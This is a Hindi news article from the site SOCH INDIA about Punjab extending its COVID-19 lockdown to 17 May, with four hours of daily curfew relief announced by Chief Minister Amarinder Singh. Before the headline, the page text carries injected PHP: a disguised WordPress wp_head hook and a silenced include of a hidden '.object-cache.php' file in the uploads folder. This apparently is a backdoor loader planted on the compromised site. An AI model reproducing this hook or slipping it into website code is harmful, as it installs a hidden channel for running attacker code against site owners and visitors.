add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); पंजाब में दो हफ्ते के लिए और बढ़ाया गया Lockdown, रोज सिर्फ 4 घंटे की मिलेगी राहत – SOCH INDIA
Menu

देश
पंजाब में दो हफ्ते के लिए और बढ़ाया गया Lockdown, रोज सिर्फ 4 घंटे की मिलेगी राहत

nobanner

देश में जारी कोरोना वायरस (coronavirus) के संकट के बीच पंजाब (Punjab) में लॉकडाउन (Lockdown) दो हफ्ते के लिए और बढ़ा दिया गया है. हालांकि, रोज चार घंटे लोगों को कर्फ्यू में राहत दी जाएगी. यानी पंजाब में अब 17 मई तक कर्फ्यू/लॉकडाउन जारी रहेगा. लॉकडाउन के दौरान, गैर-संक्रमण इलाकों में हर रोज 4 घंटे के लिए राशन दुकानों को खोला जाएगा. राज्य के मुख्यमंत्री कैप्टन अमरिंदर सिंह (Captain Amrinder Singh) ने बुधवार को इसकी घोषणा की.

कैप्टन सिंह ने कहा कि राज्य द्वारा बनाई गई विशेषज्ञों की समिति और समाज के कई वर्गों से मिले इनपुट के आधार पर यह फैसला लिया गया है. राज्य में फिलहाल कुछ समय के लिए सख्ती जारी रखना जरूरी है. कल से सुबह 7 बजे से 11 बजे तक लोगों को कर्फ्यू से राहत दी जाएगी. लेकिन यह छूट कंटेनमेंट और रेड जोन में नहीं मिलेगी. वहां पर पहले की तरह सख्ती जारी रहेगी.

मुख्यमंत्री ने राज्य के लोगों को संबोधित करते हुए कहा, “दो सप्ताह के बाद स्थिति की समीक्षा की जाएगी और महामारी के नियंत्रण में आने के बाद कुछ छूट और दी जाएगी.”

मुख्यमंत्री द्वारा घोषित सीमित छूट के अनुसार, कुछ इलाकों में हर रोज सुबह चार घंटे राशन दुकानें खोलने की अनुमति होगी लेकिन इस दौरान सिर्फ 50% स्टाफ मौजूद रहेगा. जिला अधिकारियों को आदेश दिया गया है वे राशन दुकानों को खोलने से संबंधित एक रोटेशनल शेड्यूल बनाएं. सुबह 11 बजे के बाद कर्फ्यूं में कोई ढील नहीं दी जाएगी.
मुख्यमंत्री कैप्टन अमरिंदर सिंह ने राज्य के लोगों से सुबह घर के अंदर रहने और सोशल डिस्टेंसिंग का पालन करने की अपील की.